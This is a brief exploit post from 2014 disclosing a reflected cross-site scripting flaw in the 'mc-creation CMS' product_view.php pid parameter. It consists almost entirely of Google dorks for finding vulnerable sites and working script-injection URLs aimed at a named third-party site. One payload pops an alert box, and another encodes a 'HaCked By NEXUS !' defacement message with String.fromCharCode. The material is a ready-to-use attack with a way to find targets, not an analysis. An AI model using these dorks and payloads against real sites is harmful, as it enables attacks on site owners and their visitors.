mc-creation CMS - XSS Vulnerability

mc-creation CMS - XSS Vulnerability

by Malik korrich ~ jeudi 3 juillet 2014

Dorks:

intext:"web design solution" inurl:"product_view.php?pid="

intext:"web design solution"

Exploit:

"product_view.php?pid="

Examples & Live Demos:

Testing:

http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

String to char:

http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS